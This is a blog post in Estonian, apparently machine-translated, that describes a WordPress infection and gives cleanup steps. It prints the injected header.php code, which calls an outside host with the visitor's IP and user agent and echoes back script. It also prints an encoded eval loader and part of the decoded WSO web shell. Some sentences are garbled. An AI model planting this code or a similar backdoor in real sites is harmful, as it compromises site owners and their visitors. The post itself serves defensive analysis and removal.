WordPress Viirus – PHP häkkimine – eemalda WordPress viirus

Paar päeva tagasi märkasin seade kahtlane kood (viirus / malware) jooksva ajaveebi allikas WordPress. Järgnev PHP kood viibis header.php, enne rida .

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Ma ei tea täpselt, kuidas seda viirust nimetatakse ja nimci macsee teeb täpselt seda, mida teeb, kuid on mõjutatud saitide külastajatele nähtamatu. Selle asemel põhjustab see otsingumootorites tohutut pingerida (eriti Google'is) ja seeläbi märkimisväärset langust mõjutatud veebisaitide külastajate arvus.

Detailid teada selle viiruse faili:

1. Eespool nimetatud koodi kohal header.php

2. Tekkimist fail WP-log.php kausta wp-sisaldab.

WP-log

3. Jälgi log.php wp-sisaldab koodi, krüpteeritud:

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Dekodeerimiseks kood wp-log.php:


<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

4. Kui lehele pääseb otse juurde numeblog.com/wp-includes/wp-log.php ilmub väljaleht logi. Esmapilgul tundub olevat file Juht.

Koristajad WORDPRESS.

1. Kustutage esmalt kood asukohast header.php ja fail WP-log.php pärit wp-sisaldab.

2. Kontrollige faili .htaccess kahtlaste direktiivide kohta. Lubade read või skripti täitmine.

3. Kontrollige teema kausta (/ wp-content /teemad/ Nume_tema). Otsige uusi faile ja olemasolevaid (eriti .php-faile), millel on kahtlased muudatused.

4. Kontrollige kausta pluginS (wp-content/plugins).

5. Kontrollige wp-sisu kahtlastest failidest.

6. Kontrollige kirjutamis- ja faililube. chmod si chown.

VIIRUSE KASUTAMISE SOOVITUSED WORDPRESS.

1. Esimesena on hea teha varukoopia kõigist ajaveebifailidest ja andmebaasist.

2. Kustutage kaustad wp-admin si wp-sisaldab ja kõik failid . Php saidi juurest. Kui teil on kohandatud .php-faile, on mõistlik neid käsitsi kontrollida.

3. Laadige alla rakenduse praegune versioon WordPress ja laadige üles.

4. Kontrollige andmebaasist kasutajat, kelle auaste on administrator.

See on peaaegu kõik, mida selle viiruse kohta öelda on, kuid kui teil on täiendusi või kui avastame uusi üksikasju, värskendame seda artiklit hea meelega.

STEALTH SETTINGS - EEMALDA WORDPRESS VIRUS .

Asutaja ja toimetaja Stealth Settings, aastast 2006 kuni praeguseni. Kogemus Linuxi operatsioonisüsteemidest (eriti CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Jäta kommentaar